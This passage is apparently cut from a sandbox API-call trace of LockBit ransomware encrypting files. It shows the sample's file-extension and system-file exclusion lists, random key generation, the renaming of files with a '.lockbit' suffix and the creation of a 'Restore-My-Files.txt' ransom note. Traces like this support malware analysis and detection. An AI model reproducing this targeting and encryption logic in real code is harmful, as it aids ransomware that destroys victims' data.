ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x6630, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099158.WMF", cAlternateFileName="")) returned 1 [0121.262] lstrcmpiW (lpString1=".", lpString2="J0099158.WMF") returned -1 [0121.262] lstrcmpiW (lpString1="..", lpString2="J0099158.WMF") returned -1 [0121.262] PathFindExtensionW (pszPath="J0099158.WMF") returned=".WMF" [0121.262] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0121.262] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0121.263] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0121.263] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099158.WMF") returned 1 [0121.264] lstrcmpiW (lpString1="ntldr", lpString2="J0099158.WMF") returned 1 [0121.264] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099158.WMF") returned 1 [0121.264] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099158.WMF") returned -1 [0121.264] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099158.WMF") returned -1 [0121.264] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099158.WMF") returned 1 [0121.264] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099158.WMF") returned -1 [0121.264] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.264] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned=".WMF" [0121.264] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0121.264] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0121.264] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0121.265] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0121.265] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF.lockbit") returned 72 [0121.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0121.266] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.266] malloc (_Size=0x40068) returned 0x3df0008 [0121.266] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=26160) returned 1 [0121.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0121.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0121.268] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.274] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.274] malloc (_Size=0xa6) returned 0x77d7a8 [0121.274] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.276] free (_Block=0x77d7a8) [0121.276] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.276] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.277] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.277] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65daa6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x6b9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099159.WMF", cAlternateFileName="")) returned 1 [0121.277] lstrcmpiW (lpString1=".", lpString2="J0099159.WMF") returned -1 [0121.277] lstrcmpiW (lpString1="..", lpString2="J0099159.WMF") returned -1 [0121.277] PathFindExtensionW (pszPath="J0099159.WMF") returned=".WMF" [0121.277] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0121.277] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0121.278] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0121.278] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099159.WMF") returned 1 [0121.279] lstrcmpiW (lpString1="ntldr", lpString2="J0099159.WMF") returned 1 [0121.279] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099159.WMF") returned 1 [0121.279] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099159.WMF") returned -1 [0121.279] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099159.WMF") returned -1 [0121.279] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099159.WMF") returned 1 [0121.279] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099159.WMF") returned -1 [0121.279] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.279] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned=".WMF" [0121.279] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0121.279] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0121.279] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0121.280] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0121.280] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF.lockbit") returned 72 [0121.281] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0121.282] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0121.282] malloc (_Size=0x40068) returned 0x3df0008 [0121.282] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=27546) returned 1 [0121.282] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.283] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0121.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0121.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0121.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0121.284] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0121.316] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.317] malloc (_Size=0xa6) returned 0x77d7a8 [0121.317] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0121.318] free (_Block=0x77d7a8) [0121.318] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0121.318] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0121.318] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0121.319] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x3b29, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099160.JPG", cAlternateFileName="")) returned 1 [0121.319] lstrcmpiW (lpString1=".", lpString2="J0099160.JPG") returned -1 [0121.319] lstrcmpiW (lpString1="..", lpString2="J0099160.JPG") returned -1 [0121.319] PathFindExtensionW (pszPath="J0099160.JPG") returned=".JPG" [0121.319] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0121.319] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0121.319] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0121.319] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0121.319] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0121.319] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0121.319] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0121.319] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0121.319] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0121.319] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0121.319] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0121.319] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0121.319] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0121.319] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0121.319] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0121.319] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0121.319] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0121.319] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0121.319] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0121.320] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0121.320] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0121.321] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0121.321] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0121.321] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099160.JPG") returned 1 [0121.321] lstrcmpiW (lpString1="ntldr", lpString2="J0099160.JPG") returned 1 [0121.321] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099160.JPG") returned 1 [0121.321] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099160.JPG") returned -1 [0121.321] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099160.JPG") returned -1 [0121.321] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099160.JPG") returned 1 [0121.321] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099160.JPG") returned -1 [0121.321] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0121.321] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned=".JPG" [0121.321] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0121.321] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0121.321] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0121.321] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0121.322] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0121.322] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0121.322] lstrcmpiW (lpString1=".sdb", 